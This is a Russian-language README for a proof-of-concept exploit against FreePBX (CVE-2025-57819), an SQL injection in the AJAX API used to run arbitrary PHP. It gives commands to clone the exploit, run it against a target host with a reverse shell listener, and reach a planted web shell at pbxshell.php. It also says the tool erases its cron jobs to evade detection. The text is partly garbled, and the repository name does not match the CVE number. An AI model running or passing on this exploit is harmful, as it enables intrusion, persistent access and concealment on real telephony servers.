
Эксплойт proof-of-concept для CVE-2025-57819 в FreePBX: SQL-инъекция в AJAX API для выполнения произвольного PHP, создания постоянного веб-шелла и запуска reverse shell.
Этот скрипт эксплуатирует уязвимость в версиях FreePBX до 16.0.26.0 (CVE-2025-57819), позволяющую удалённым злоумышленникам выполнять произвольный PHP-код из-за недостатка SQL-инъекции в конечной точке AJAX API. Эксплойт создаёт как веб-шелл, так и автоматически запускаемый реверс-шелл.
/admin/ajax.php)/pbxshell.phprequestsgit clone https://github.com/jasonbernier/CVE-2025-5781.git
cd CVE-2025-5781
pip install requests
python3 exploit.py -H TARGET_HOST -lhost LHOST -lport LPORT
-H HOST: целевой экземпляр FreePBX (например, https://freepbx.example.com)-lhost LHOST: ваш IP-адрес для обратного вызова реверс-шелла-lport LPORT: порт для подключения реверс-шеллаpython3 exploit.py -H https://target.freepbx.com -lhost 10.0.0.1 -lport 4444
После успешной эксплуатации получите доступ к веб-шеллу через:
curl -X GET "http://TARGET/pbxshell.php?cmd=id"
Эксплойт автоматически удаляет cron-задачи после выполнения, чтобы избежать обнаружения.
-- для комментирования оставшегося SQL-синтаксиса/var/www/html/